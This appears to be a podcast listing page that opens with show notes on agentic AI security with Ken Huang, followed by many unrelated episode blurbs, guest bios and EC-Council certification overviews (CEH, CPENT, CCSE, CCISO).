⬥GUEST⬥
Ken Huang, Co-Chair, AI Safety Working Groups at Cloud Security Alliance | On LinkedIn: https://www.linkedin.com/in/kenhuang8/

⬥HOST⬥
Host: Sean Martin, Co-Founder at ITSPmagazine and Host of Redefining CyberSecurity Podcast | On LinkedIn: https://www.linkedin.com/in/imsmartin/ | Website: https://www.seanmartin.com

⬥EPISODE NOTES⬥
In this episode of Redefining CyberSecurity, host Sean Martin speaks with Ken Huang, Co-Chair of the Cloud Security Alliance (CSA) AI Working Group and author of several books including Generative AI Security and the upcoming Agent AI: Theory and Practice. The conversation centers on what agentic AI is, how it is being implemented, and what security, development, and business leaders need to consider as adoption grows.

Agentic AI refers to systems that can autonomously plan, execute, and adapt tasks using large language models (LLMs) and integrated tools. Unlike traditional chatbots, agentic systems handle multi-step workflows, delegate tasks to specialized agents, and dynamically respond to inputs using tools like vector databases or APIs. This creates new possibilities for business automation but also introduces complex security and governance challenges.

Practical Applications and Emerging Use Cases

Ken outlines current use cases where agentic AI is being applied: startups using agentic models to support scientific research, enterprise tools like Salesforce's AgentForce automating workflows, and internal chatbots acting as co-workers by tapping into proprietary data. As agentic AI matures, these systems may manage travel bookings, orchestrate ticketing operations, or even assist in robotic engineering—all with minimal human intervention.

Implications for Development and Security Teams

Development teams adopting agentic AI frameworks—such as AutoGen or CrewAI—must recognize that most do not come with out-of-the-box security controls. Ken emphasizes the need for SDKs that add authentication, monitoring, and access controls. For IT and security operations, agentic systems challenge traditional boundaries; agents often span across cloud environments, demanding a zero-trust mindset and dynamic policy enforcement.

Security leaders are urged to rethink their programs. Agentic systems must be validated for accuracy, reliability, and risk—especially when multiple agents operate together. Threat modeling and continuous risk assessment are no longer optional. Enterprises are encouraged to start small: deploy a single-agent system, understand the workflow, validate security controls, and scale as needed.

The Call for Collaboration and Mindset Shift

Agentic AI isn't just a technological shift—it requires a cultural one. Huang recommends cross-functional engagement and alignment with working groups at CSA, OWASP, and other communities to build resilient frameworks and avoid duplicated effort. Zero Trust becomes more than an architecture—it becomes a guiding principle for how agentic AI is developed, deployed, and defended.

⬥SPONSORS⬥
LevelBlue: https://itspm.ag/attcybersecurity-3jdk3
ThreatLocker: https://itspm.ag/threatlocker-r974

⬥RESOURCES⬥
BOOK | Generative AI Security: https://link.springer.com/book/10.1007/978-3-031-54252-7
BOOK | Agentic AI: Theories and Practices, to be published August by Springer: https://link.springer.com/book/9783031900259
BOOK | The Handbook of CAIO (with a business focus): https://www.amazon.com/Handbook-Chief-AI-Officers-Revolution/dp/B0DFYNXGMR
More books at Amazon, including books published by Cambridge University Press and John Wiley, etc.: https://www.amazon.com/stores/Ken-Huang/author/B0D3J7L7GN
Video Course Mentioned During this Episode: "Generative AI for Cybersecurity" video course by EC-Council, rated an average of 5 stars by 255 people: https://codered.eccouncil.org/course/generative-ai-for-cybersecurity-course?logged=false
Podcast: The 2025 OWASP Top 10 for LLMs: What's Changed and Why It Matters | A Conversation with Sandy Dunn and Rock Lambros
In this episode of the Stats on Stats Podcast, US Army veteran and life coach Derick Johnson shares his inspiring journey from overcoming personal trauma to helping others break old patterns and thrive. Derick discusses his transformative path from fitness to life coaching, the importance of presence and mental clarity, and his unique approach to guiding high achievers toward a balanced, fulfilling life. Guest Connect LinkedIn: https://www.linkedin.com/in/derickjohnson1 Spotify: https://open.spotify.com/episode/3iikvcL3dFv2SS5Oqn34qB Website: https://fitwithderick.com/ YouTube: https://youtube.com/@fitwithderick Stats on Stats Resources LinkTree: https://linktr.ee/statsonstatspodcast Stats on Stats Partners & Affiliates Blacks in Technology Conference (BITCON) | Use code “bitcon-stats” for 10% discount on tickets. BITCON is the premier conference for Black IT professionals, entrepreneurs, and technology enthusiasts. The Blacks In Technology community will host their largest conference to date with thousands of attendees anticipated the week of Labor Day 2024 in Atlanta, GA Sept. 4-6. Ready to Register? Here's How: ☑ Click on this link: BITCON 2024 Tickets (https://tickets.blacksintechnology.org) ☑ Select "BITCON 2024" ☑ Click "Buy Tickets" ☑ Apply our promo code (bitcon-stats) at checkout for 10% off your General Admission ticket. Sorry Not Public Schedule Your Visit Today: https://bit.ly/snp-invitation Discover an incredible and budget-friendly co-working space in Downtown Tampa! Your first visit is on us—come see for yourself! 
EC-Council's Hacker Halted Conference Website: https://hackerhalted.com/ Promo Code: hhsosvip Antisyphon Training Website: https://www.antisyphontraining.com/ Ellington Cyber Academy: https://kenneth-ellington.mykajabi.com/ Discount Code "statsonstats" Kevtech Academy Website: https://www.kevtechitsupport.com/ Dream Chaser's Coffee Website: https://dreamchaserscoffee.com/ Discount code: "statsonstats" Podcasts We Like DEM Tech Folks Website: https://linktr.ee/developeverymind IntrusionsInDepth Website: https://www.intrusionsindepth.com/ Elastic DoD Architects YouTube: https://www.youtube.com/@elasticdod ----------------------------------------------------- Episode was shot and edited at BlueBox Studio Tampa https://blueboxdigital.com/bluebox-studio/
In this episode, we sit down with Vivek Ramachandran, the founder of SquareX, to explore the evolving landscape of cybersecurity. Vivek shares his journey from his first encounter with computers to becoming a prominent figure in the field. We discuss his company's innovative approach to browser-native security solutions, the importance of collaboration, and the lessons he's learned transitioning from researcher to product builder. Guest Connect Vivek Ramachandran LinkedIn: https://www.linkedin.com/in/vivekramachandran/ E-mail Vivek@sqrx.com Stats on Stats Resources LinkTree: https://linktr.ee/statsonstatspodcast Stats on Stats Partners & Affiliates Sorry Not Public Schedule Your Visit Today: https://bit.ly/snp-invitation Discover an incredible and budget-friendly co-working space in Downtown Tampa! Your first visit is on us—come see for yourself! EC-Council's Hacker Halted Conference Website: https://hackerhalted.com/ Promo Code: hhsosvip Antisyphon Training Website: https://www.antisyphontraining.com/ Ellington Cyber Academy: https://kenneth-ellington.mykajabi.com/ Discount Code "statsonstats" Kevtech Academy Website: https://www.kevtechitsupport.com/ Dream Chaser's Coffee Website: https://dreamchaserscoffee.com/ Discount code: "statsonstats" Podcasts We Like DEM Tech Folks Website: https://linktr.ee/developeverymind IntrusionsInDepth Website: https://www.intrusionsindepth.com/ Elastic DoD Architects YouTube: https://www.youtube.com/@elasticdod ----------------------------------------------------- Episode was shot and edited at BlueBox Studio Tampa https://blueboxdigital.com/bluebox-studio/
Footprinting serves as the initial phase in assessing the security status of a target organization's IT infrastructure. Engaging in footprinting and reconnaissance activities can collect extensive information about a computer system, network, and any connected devices. Footprinting creates a detailed security profile for an organization and should be carried out systematically. What is Footprinting? Footprinting is the first step of any attack on an information system in which attackers collect information about a target network to identify various ways to intrude into the system or network. View More: Exploring Module 02 of EC Council's CEH: Footprinting and Reconnaissance
The EC-Council's Certified Ethical Hacker (CEH) certification is a prestigious credential in the field of information security, specifically focusing on ethical hacking. This certification program aims to offer an in-depth knowledge of identifying weaknesses and vulnerabilities in IT systems, adopting the viewpoint of a malicious hacker, yet doing it legally and legitimately. This certification program trains individuals in the advanced step-by-step methodologies that hackers use, such as writing virus codes and reverse engineering, to better protect corporate infrastructure from data breaches. Held in high regard in the IT security industry, the CEH certification encompasses various modules, each focusing on different aspects of information security. A pivotal part of this certification program is the first module, “Introduction to Ethical Hacking.” This article explores the key topics addressed in Module 1 of the CEH certification exam, providing insight into its importance and scope within the broader context of ethical hacking and cybersecurity. Module 1: Introduction to Ethical Hacking Let us start exploring the first module, “Introduction to Ethical Hacking” of the CEH certification exam by examining the contents of this module. View More: Exploring Module 01 of EC Council's CEH: Introduction to Ethical Hacking
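Global Security Experts Inc. (GSX) announced on March 29 that Mr. Kobayashi (小林浩史) of the Education Business Department in its Consulting Division has received the "EC-COUNCIL Instructor Circle of Excellence" award.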
What is the CPENT Exam? EC-Council's Certified Penetration Tester (CPENT) is an advanced-level cybersecurity credential for experienced security experts and ethical hackers who wish to enhance and assess their penetration testing abilities and skills. This certification aids in performing the thorough evaluations needed to efficiently detect and reduce security risks to computer systems, networks, and infrastructures. It will teach you how to conduct successful penetration testing in a network environment designed for businesses that must be targeted, exploited, avoided, and protected. The certification will assist in understanding how to do penetration testing on modern businesses' networks, including IoT and OT systems. You will learn how to perform advanced Windows attacks, bypass filtered networks, write your own exploits, perform single and double pivoting, conduct binary exploitation and advanced privilege escalation, customize scripts, and more. The CPENT certification exam is fully practical, conducted online, and remotely proctored. View More: Tips to Follow while Preparing for the CPENT Exam
Welcome to our insightful Podcast on the foundations of Threat Intelligence and the crucial role it plays in decoding cyber threats. In this comprehensive guide, we will explore the lifecycle of Threat Intelligence, from collection to analysis and dissemination, empowering you with a deeper understanding of this vital cybersecurity discipline.
Today, the world is adopting the cloud for all their business operations and even personal purposes. With the technology's dynamic nature, the career scope in cloud computing is rapidly expanding, resulting in a strong demand for individuals with the skills to satisfy the ever-increasing demand. Professionals who can assist these firms in securing their data and applications in the cloud are also required. Therefore, there is an enormous demand for cloud security experts in the industry. Cloud security positions are expected to be among the most prominent roles available to any cybersecurity expert in the coming years. View More: Breaking Through the Cloud Security Skills Gap with EC-Council's CCSE
CompTIA PenTest+ and EC Council's CEH are intermediate-level certifications validating offensive security skills. The content of these certifications looks similar and makes it difficult to decide which one to choose as a career path. We have crafted an in-depth article that explores the key differences between PenTest+ and CEH certifications to help you make an informed decision. Gain valuable insights from this comprehensive guide and discover which certification aligns better with your professional aspirations in the field of cybersecurity. What is CompTIA's PenTest+ Certification? CompTIA PenTest+ certification is designed for cybersecurity professionals responsible for identifying, exploiting, managing, and reporting vulnerabilities by performing penetration testing and vulnerability assessment on the organization's network. It mainly focuses on the offensive security skills required to conduct comprehensive penetration testing. This certification helps to achieve an in-depth understanding of penetration testing objectives such as: View More: CompTIA PenTest+ vs. EC Council's CEH
Guest: Patrick Gorman, AKA InfoSec Pat, Director of Offensive Security at Cloud Computing Concepts
On Twitter | https://twitter.com/Infosecpat
On LinkedIn | https://www.linkedin.com/in/infosecpat/
On YouTube | https://www.youtube.com/c/InfoSecPat
Host: Frankie Thomas
On ITSPmagazine
Donna Gallaher is the President and CEO of New Oceans Enterprises. New Oceans Enterprises is a Cyber, IT, and Operational Risk Management Advisory Service that facilitates collaboration among your company's business units to develop policies and operational risk mitigation strategies appropriate for your risk tolerance. Donna was recently recognized as one of the top 12 vCISO Influencers to watch and inducted into EC Council's 2023 C|CISO Hall of Fame. Donna currently serves on the Board of Advisors for the FAIR Institute and is President of the Atlanta FAIR Chapter. She is one of the founding members of vCISO Catalyst, a professional association for vCISOs. She holds CISSP, CCISO, CIPP/E, CIPM and ITIL, and Open FAIR certifications and is designated a Fellow of Information Privacy by IAPP. She is a graduate of Auburn University with a Bachelor of Science in Electrical Engineering. In this episode… In this age of technology, it's wise for companies to have some sort of cybersecurity expert on staff to protect the organization's data from theft and damage. But what happens if you're a startup or small company and unable to afford a full-time expert? Or perhaps you're a larger corporation with cyber technology in need of updating? Whatever your company's needs are, you may want to enlist the services of someone like Donna Gallaher, a securities strategist who owns a securities advisory firm that contracts out services. Firms like Donna's can provide a list of options to protect your company's data, intellectual property, and assets. Tune in to this informative episode of the She Said Privacy/He Said Security Podcast as Jodi and Justin Daniels welcome Donna Gallaher, President and CEO of New Oceans Enterprises, to discuss the role of a CISO. Donna explains the services a CISO offers, why smaller companies are prime targets for hackers, and how to prevent cybersecurity threats.
New and cutting-edge technology now dominates the planet. Information security is one of the most important aspects of today's cutting-edge technology. As the amount of data grows daily, hackers target it with various harmful intentions, but certified Ethical Hackers within the organization are there to prevent these data breaches. What is C|EH v12? The threat in the internet world will continue to increase. Therefore, there is a surge in the requirement for professionals like Ethical Hackers capable of preventing cyber threats and attacks in organizations worldwide. A Certified Ethical Hacker (C|EH) is a fully trained professional who knows and understands how to look for vulnerabilities and gaps in the target network. C|EH certification prepares individuals to find vulnerabilities in the target organization's systems by using the information and tools used by malicious attackers. C|EH has been the best ethical hacking certification in the world for 20 years, and different companies continue to rank it as the best. EC-Council launched the new C|EH v12, the latest version of the C|EH program, on September 7, 2022. The updated learning framework includes an extensive training program to equip you for the certification exam and the most robust, in-depth, hands-on lab and practice range experience in the industry. The C|EH v12 certification will lead you to a successful career in the cybersecurity field.
The Certified Ethical Hacker (C|EH v12) program is one of the most respected certifications in the cybersecurity field. It has been the world's number one ethical hacking certification for 20 years and is continuously ranked number one in ethical hacking certification by different firms. The EC-Council launched a new version of the Certified Ethical Hacker (CEH) certification, CEH v12, on 7th September 2022. #cehv12 #ceh #cehcertification #cehvideo #cehv12launch #eccouncil #ethicalhacking #ethicalhackingcourse Thank you for watching this video. For more details or a free demo with our expert, write to us at sales@infosectrain.com
✅Agenda of the Session
✔️What is CEH?
✔️What's New in CEHv12
✔️Certify
✔️Engage
✔️Compete
✔️Select Your Course Kit
Subscribe to our channel to get video updates. Hit the subscribe button above. Facebook: https://www.facebook.com/Infosectrain/ Twitter: https://twitter.com/Infosec_Train LinkedIn: https://www.linkedin.com/company/infosec-train/ Instagram: https://www.instagram.com/infosectrain/ Telegram: https://t.me/infosectrains
The Chief Information Security Officer, commonly known as CISO, is the top-level executive in charge of an organization's data and cybersecurity needs. Chief Information Security Officers (CISO) must have a thorough understanding of IT infrastructure as well as the numerous threats that can be posed to computer systems. The CISO's primary responsibility is to implement security protocols and procedures. To become a CISO, one must pass the CCISO certification exam. EC-Council CCISO Domain 1: Governance, Risk, and Compliance
Esports is a multi-million dollar industry where teams compete in online competitions against each other. In this episode of The Board Table, NCSBA Director of Board Development & Technology Ramona Powers talks with Dr. Christine Fitch, school board member in Wilson County and esports advocate, Isiah Reese, CEO at Aperion Global Institute and Blaze Fire Games and Wesley Alvarez, Director of Academics, EC-Council about esports learning and gaming possibilities for North Carolina students.
Cloud technology has been a driving reason for businesses to operate effortlessly in the modern digital era. It has completely transformed how businesses operate as it is an evolution from mainframe computing to client/server deployment methods. However, from a security standpoint, the move to the cloud has created many unknown threats and concerns. Cloud security professionals attempt to secure the cloud environments. Therefore, organizations require professionals with the expertise to secure their cloud environments. The CCSE certification gives you the knowledge and hands-on experience you need to protect cloud platforms using security principles, tools, techniques, and practices. Benefits of EC-Council Certified Cloud Security Engineer (C|CSE)
In 2022, is there any investigation that will not benefit from digital evidence collection? Our guest this week, Robert Fried, is a digital forensics expert who discusses the answer to this question with Leah in addition to other digital evidence collection questions.

Robert Fried is a seasoned expert and industry thought leader with over 20 years of experience in data collection and forensic investigations. As Senior Vice President and Global Head of Sandline's Forensics and Investigations practice, he leads day-to-day operations and oversees the forensic services offered to clients, including data collection, forensic analysis, expert testimony, and forensic consultation. Previously, he has held senior-level positions in digital forensic practices at global professional services firms and worked as a computer crime specialist at the National White Collar Crime Center. He has developed and instructed computer forensics and investigative training courses for federal, state, and local law enforcement agencies.

Robert holds a BS and MS in Forensic Science and certificates in Law Enforcement Science, Computer Forensic Investigation, and Information Protection and Security from the University of New Haven. He serves on the Board of Advisors for the Master's in Investigations program at the University of New Haven and the Global Advisory Board for EC-Council's Computer Hacking Forensic Investigator (C|HFI) certification. Robert is a licensed professional investigator in Michigan and a licensed private investigator in New York. He is a frequent speaker at industry events, has been a guest on industry podcasts, and has been published in several professional publications. He has also authored the book Forensic Data Collections 2.0: The Guide for Defensible & Efficient Processes and contributes to PI Magazine, where he created the CyberSleuthing department and shares insightful content on topics relating to digital forensics, eDiscovery, data privacy, and cybersecurity.

RESOURCES MENTIONED IN TODAY'S EPISODE
Order Robert's new book Forensic Data Collections 2.0: The Guide for Defensible & Efficient Processes on Amazon.

CONNECT WITH GUEST: ROBERT FRIED
LinkedIn: @RobertFried
Website: www.forensicsbook.com

CONNECT WITH WORKMAN FORENSICS
Youtube: @WorkmanForensics
Facebook: @wforensics
Twitter: @wforensics
Instagram: @wforensics
LinkedIn: @workmanforensics

Subscribe and listen to this and more episodes of The Investigation Game on Apple Podcasts, Android, or anywhere you listen.
Satyavathi has over 24 years' experience in IT and cyber security and is the go-to person for critical security projects at CyberRes, a Micro Focus line of business, and spearheads enterprise security architecture and cloud technology. She is an inventor, a thought leader, a noted speaker in international and national forums, & has been recognized as Top 10 Women in Tech Leaders in India, Top 20 Indian Women Security Influencer, Women in Tech - Chief Mentor and more. She also serves on the board of nonprofit organizations i.e., Chairman of Cloud Security Alliance, Bangalore, and Global Advisory Board Member - CTIA at EC-Council. In case you want to reach out to her, you can find her on LinkedIn - https://www.linkedin.com/in/satyad/ Twitter - @Satya_Divadari Follow "Stories of Infosec Journeys" podcast on LinkedIn - Stories of Infosec Journeys Twitter - @InfosecJourneys Instagram & Facebook - @storiesofinfosecjourneys Kindly rate the podcast on Spotify and leave a review on Apple podcast.
Today we are joined by a very special guest - Maxim Balin, Product Manager CloudIQ Cybersecurity. Maxim was just announced as one of the top 100 Ethical Hackers and a member of “Hall of Fame 2021”, according to EC-Council. Join us as we discuss ethical hacking, cyber security risks, and how customers can use CloudIQ cyber assessment to monitor and troubleshoot your infrastructure in order to make your business safer. Learn more:
www.delltechnologies.com/cloudiq
www.delltechnologies.com/en-us/blog/dell-technologies-bolsters-aiops-with-cybersecurity/
Abhishek Bhattacharya is a blockchain pioneer in India. When I say he is a pioneer, there are reasons behind this designation. He is 26 and he has been a 3X Entrepreneur, 2x Author, and Educator. He is building India's Biggest Blockchain Platform. Currently, he is leading a trendsetter: a unique start-up that works to facilitate the government and banks in the area of agriculture. Abhishek is a Co-founder at Whrrl and was a Product Owner for the service product at Policybazaar (an Indian unicorn insurance aggregator). At Whrrl, he's building India's first Agri-Fintech Blockchain platform that can save 25-40% of farmers' income, and protect banks from millions in very regular frauds in the segment of Warehouse Receipt Finance. This integrated mega-platform is currently deployed in 1,400 warehouses across 5 states in India, has over US $500 Mn commodities tokenized on the blockchain, and over US $1 Mn digital loans dispatched to farmers and agri-businesses, with US $330 Mn committed by the partner banks to be routed via the platform. Whrrl has been incubated at IIM Ahmedabad, University of Toronto's CDL, Chiratae Innovators' Program, TheGAIN in collaboration with MeiTy, GUSEC et al. He is a regular speaker on blockchain and has given 2-day workshops in universities, in an attempt to show students the importance of choosing blockchain as a career path. Apart from that, he has given lectures in blockchain for 5,000+ faculty, PhDs, and students worldwide. He's an Educator with ODEM, and a visiting faculty with Amity's Post Graduate Program in Blockchain Technology and Management. He has also advised the Certified Blockchain Professional (CBP) Course by EC-Council that's present across 145 countries. Lastly, he was nominated for the "Top 50 Tech Leaders" award by InterCon Dubai.
He had been invited as a Speaker at one of Europe's biggest Blockchain conferences - Decentralized 2019 in Athens, Greece; as a Speaker at The Blockchain World Forum in Shenzhen, China; and as a Panelist/Speaker with a nomination for Best Crypto Educator in GURUS Awards by Next Block Asia 2.0 in Bangkok, Thailand last year; as a panellist/judge at Govt. of India's program for startups at IIM Kashipur; and, as a Speaker at the European Digital Week and Global Technology Summit, 2020. https://www.linkedin.com/in/abhib3012/ --- Send in a voice message: https://anchor.fm/teacherparv/message
IT infrastructure and security specialist Peter is an experienced IT security specialist who readily shares his experience at various events, training sessions, and conferences. He holds various Microsoft, Cisco, and EC-Council trainer certifications. He received the Microsoft MVP: Enterprise Security status award in 2011-2017. Toms Pēcis, ethical hacker and social engineer | The specialist helps organizations better understand emerging cybersecurity threats and the risks arising from attacks based on social engineering. Toms readily takes on educational work about IT security threats, working not only with company representatives but also with schools and children.
Discussion on cyber security certifications. Which make sense. Where to focus. How to proceed. I cover certifications from GIAC, ISC2, ISACA, EC-Council, Amazon, Microsoft, Google, CompTIA, and others. This episode discusses areas to find training and recommendations before taking certification exams. These are recommendations only and based on my opinion and experiences. Please do research before investing in any certification or training course.
ISC2: https://www.isc2.org/
ISACA: https://www.isaca.org/
Offensive Security: https://www.offensive-security.com
EC-Council: https://cert.eccouncil.org/
GIAC: https://www.giac.org/
GIAC Roadmap: https://www.giac.org/certifications/get-certified/roadmap
AWS: https://aws.amazon.com/certification/
12 MS Azure certifications: https://cloudacademy.com/blog/microsoft-azure-certifications-which-is-right-for-you-and-your-team/
Google Cloud Certifications: https://cloud.google.com/certification/
SANS: https://www.sans.org/
Infosec Institute: https://www.infosecinstitute.com/
UDEMY: https://www.udemy.com/
Cloud Academy: https://cloudacademy.com/
Matthew Rosenquist is the Chief Information Security Officer at Eclipz, a cybersecurity innovator that develops, distributes, and deploys new technology services that secure sensitive data in transit. He also serves in advisory positions on the boards of many esteemed organizations, including the World Business Angels Investment Forum, the Private Directors Association, EC-Council, and many others. In addition to this, Matthew hosts the YouTube show, Cybersecurity Insights, where he talks about all things cybersecurity to help viewers protect themselves and their companies from common risks and attacks. In this episode… Are you intimidated by the constant news about large-scale ransomware attacks, data breaches, and other cyber risks? Do you want to protect yourself and your company — but don't quite know where to start? Recent ransomware attacks — such as the SolarWinds data breach — have brought the importance of cybersecurity and data privacy to the immediate attention of companies all over the world. Because of this, cybersecurity is changing from a personal consideration to a national conversation. Tech gurus are no longer the only privacy and security experts; now, businesses of all sizes are beginning to prioritize cybersecurity and data privacy at all costs. So, where should you start when it comes to shielding your business from common cyber risks and attacks? In this episode of She Said Privacy/He Said Security, Jodi and Justin Daniels sit down with Matthew Rosenquist, the Chief Information Security Officer at Eclipz, to discuss the importance of protecting your company from dangerous ransomware attacks. Listen in as Matthew talks about the recent cyber attacks that are taking over national headlines, the pros and cons of regulation and litigation, and the personal privacy strategy that will help you protect your data today. Stay tuned!
On this episode of People of Tech, Charles is joined by Philip Blake, the Country Manager (UK and EU) of EC-Council, the world's largest certification body for Ethical Hacking and Advanced Information Security Training. Philip has been working at EC-Council since 2016. His employers are the suppliers of cybersecurity training including leadership training courses for IT professionals. In the podcast, Philip discusses his career to date, explains more about what EC-Council provide to their customers and gives his opinion on the current threat landscape in regards to how we can protect ourselves and our organisations. Originally published on 4/2/2019
Host Amber Pedroncelli welcomes two guests to the show this week. First, Bryan Lopez, Director of Emerging Technologies for the Department of the Navy Chief Information Officer, discusses the interview he conducted with retired Vice Admiral Jan Tighe about cyber aptitude testing in the Navy and beyond. Vice Admiral Tighe collaborated with EC-Council on the creation of the CyberQ Aptitude Assessment.
Has COVID helped the future of education? – Té Digital Podcast. In today's program we ask the question: has COVID helped the future of education? We do so with the help of our colleague Eng. Marvin Soto, who has an impressive résumé: he is a Certified Ethical Hacker and an EC-Council certified instructor for ethical hackers. Marvin has also been accredited as an expert in "Cybersecurity and the fight against cybercrime" by the European Cybercrime and the Spanish Police, and as an expert in "Cybercrimes against minors" by the National Police of Peru through Interpol, among many other things in his more than 23 years of professional career. Marvin tells us that he has recently been very active working on the topic of post-COVID education, and on how important it is to address computing culture from a cybersecurity point of view. At Té Digital we already have several programs dealing with topics related to technology and education: we have indeed realized that, as teachers or users, we were not prepared for this new reality. Marvin tells us that we are indeed facing a new generation that was even born hand in hand with technology, and that is where we realize that, from an educational point of view, perhaps not all the risks we face are being kept in mind. Randy: The challenge is not only learning about the new tools, but doing so safely. (Risk is the slightest possibility that something with negative consequences materializes.)
Marvin: Indeed, much of the current population is an analog population that has had to adapt to new technologies. We even have figures showing that this Industry 4.0 has more than 50% of its activities or tasks automated. Since many of these activities are virtual, this leads us to think about those analog people who are migrants to the digital world; even digital natives or millennials do not consider security risks in order to avoid becoming victims of fraud. As we go through this time of pandemic, and probably after we get past it, if we do not educate or raise awareness in society, the risks will very likely become exponential. Our children are very bold with technology; we often say they were born with that chip. They have that advantage compared with teachers, who before the pandemic perhaps only used the computer to give exams; today, given this pandemic scenario, the risks mentioned are amplified.
Topic: The Cyber Burnout On this week's tech corner, we take a break from technology and address Cyber Burnout the mental human side of it all. Joining the show this week are friends Renee Small and Dr Dan Schaefer to discuss how to avoid and deal with burnout, how to lead out of it and discuss the January #infosechires challenge Guest Bio: Renee's bio: I am Amazon's #1 Best Selling Author of Magnetic Hiring: Your Company's Secret Weapon to Attracting Top Cyber Security Talent (https://amzn.to/3sHM2VX). My company, a minority, woman-owned small business (MWOSB), has been awarded the Stevie Award for 2017 Female Entrepreneur of the Year. At (name of company), we build win-win strategies for companies to hire the top talent for cyber security. I co-host the Breaking Into Cybersecurity LinkedIn Live & podcast series that has over 100,000 views. Outside of running my business, I am the contributing editor for CISOMag, EC-Council's magazine targeted to CIOs, CTOs, and CISOs & the contributing editor for CyberCapital.us, Northern Virginia Technology Council's cybersecurity-focused micro-site. My proven success has come from me helping my clients win multiple hundred million dollar contracts by providing them with top, diverse talent. I'm passionate about helping CIOs, CTOs, and CISOs solve their security talent challenges and helping talented cybersecurity professionals find their next dream job. I'm fascinated by the insider threat. I'm curious as to why more companies don't leverage HR to partner with information security to prevent insider threats. I have had the unique experience to recruit and build out multiple Fortune 500 cyber security groups and to also join the security team as a program manager and lead on the security monitoring team. I use this blended experience to help leaders build amazing teams and place top security professionals in their next dream job. Dr. 
Dan Schaefer Bio: Dan Schaefer and Peak Performance Strategies are simply about identifying–early–anything that may get in between you and top performance. Dr. Dan works with people in business, sports & entertainment who are often, “alone at the top.” Dan is a confidential sounding-board for CEOs, entrepreneurs and groups throughout the United States, South America, Europe and Asia, advising them on people, culture and the psychology of the workplace. He has developed breakthrough strategies in sports performance for professionals: NFL, NHL Goaltenders, Major League Soccer, boxing, ultra & extreme runners, golf, tennis, skiing and amateur athletes. Consultants, sports agents, GM's and coaches also rely on Dr. Dan to get their teams performing at their best. Tech Corner is supported by these great partners, please make sure to check them out: KnowBe4: https://info.knowbe4.com/phishing-security-test-cyberhub Whistic: www.whistic.com/cyberhub James Azar Host of CyberHub Podcast James on Linkedin: https://www.linkedin.com/in/james-azar-a1655316/ The Hub of the Infosec Community. Our mission is to provide substantive and quality content that's more than headlines or sales pitches. We want to be a valuable source to assist those cybersecurity practitioners in their mission to keep their organizations secure.
This week I sit down with my buddy Dutch Schwartz and just catch up on all the things. We talk about music, security, and even Bruce Lee! And of course, we end the episode with the world-famous "Last Sip" in which we get a chance to hear what Dutch wants his legacy to be. Cocktails of the day: Old Fashioned. Meet Dutch: Dutch Schwartz has more than 20 years of experience in technology from startups to the world’s largest companies. He’s recognized as a thought leader in cybersecurity and his LinkedIn content has over 130k views in 2020. A sought-after speaker, he has been a panelist on popular podcasts including CISO Series, Security Metrics, CISOlife, CyberHub, Conversations with Dr. Cybersecurity, and the EC-Council. Having worked with more than 50 CISOs of Fortune 500 companies to create cybersecurity solutions, he understands the evolution of CISO responsibilities and the challenges which security teams face. Dutch holds a Master’s of Business Administration in Global Management and was a strategy and planning officer in the US Army. He melds his formal training with his practical experience in cybersecurity to develop cloud security strategies for customers of Amazon Web Services.
The Brand Marketing Podcast: Digital Marketing Insights & Startup Lessons
Hello and welcome to today's episode of The Brand Marketing Podcast and today, I'll be sharing with you a brief overview of public vs private blockchain, the similarities between the two, along with the difference between public and private blockchain. Watch on YouTube: Public vs Private Blockchain | Difference Between Public and Private Blockchain Recommended Video, What is Blockchain Technology and How does it work | Blockchain Explained Confused about How to become a blockchain professional? Join this top blockchain certification for beginners offered by EC-Council! Let's get social! https://twitter.com/brandlitic https://www.youtube.com/channel/UCF-uUxo43IPpnEwnR62WGlA/ https://www.instagram.com/brandlitic https://www.facebook.com/brandlitic See you in the next episode!
Today's Guest: Sanjay Bavisi, President of EC-Council. In this episode, we explore how an attorney who was a technologist at heart has followed his passion to make a global impact on security.
Episode 107 of the #MVPbuzzChat series. Conversation between Microsoft Regional Director and MVP Christian Buckley (@buckleyplanet), Founder & CEO of CollabTalk LLC, and Microsoft Regional Director and Cloud and Datacenter Management MVP Ahmed Nabil Mahmoud (@ITCalls_ANabil), a regional senior information security and risk manager for Standard Chartered Bank, MBA and PMP, and C|CISO advisory board member for EC-Council who is based out of UAE. Recorded in September 2020. In this episode, Ahmed and I discuss his "origin story" for the MVP and RD programs, beginning with his efforts to catalog all of his ideas and thoughts on technology through his blog, and how that expanded and opened up opportunities within information security and digital transformation. On the latter, Ahmed talks about how previously underserved communities are being transformed by technology, and how our collective community efforts play a large part in this growth and prosperity. You can find this entire episode and other MVP and RD interviews on the CollabTalk YouTube page at https://youtu.be/3gnQ6hZF6mo
Keyaan J Williams is the Founder and Managing Director of Cyber Leadership and Strategy Solutions (CLASS-LLC), a professional services firm that helps global clients with cybersecurity strategy, program management, and workforce development. His professional experience includes two decades of support for corporate information security and risk management programs in large, regulated enterprises. Keyaan's reputation for leadership was established when he led the operational transformation of the Information Systems Security Association (ISSA) as the President of the International Board of Directors. He also served as the Sr. Manager Global Information Security with the DB Consulting Group working to build the program that standardized information security, risk management, and compliance practices across 46 country offices in Africa, Asia, and the Americas. This position stemmed from his previous service as Director Information Security (ISSO) for Centers for Disease Control and Prevention where he directed all aspects of information security, compliance, and risk management within the CDC Center for Surveillance, Epidemiology, and Laboratory Services (CSELS). Keyaan has contributed to many books and publications, including his role as a leading author of the Certified CISO Body of Knowledge used by EC-Council to train and certify thousands of global technology and security executives. Keyaan's talk at Global CISO Forum is titled Avoiding Senseless Security Metrics: A new prescription for seeing security information clearly. In Keyaan's own words: The struggle with metrics affects all business leaders who strive to measure and communicate the value of their programs and initiatives. Security metrics might be the most difficult measurements to communicate because non-technical business leaders and security executives speak completely different languages. 
This session shines a new light onto old security measurements to help our business counterparts see the information more clearly.
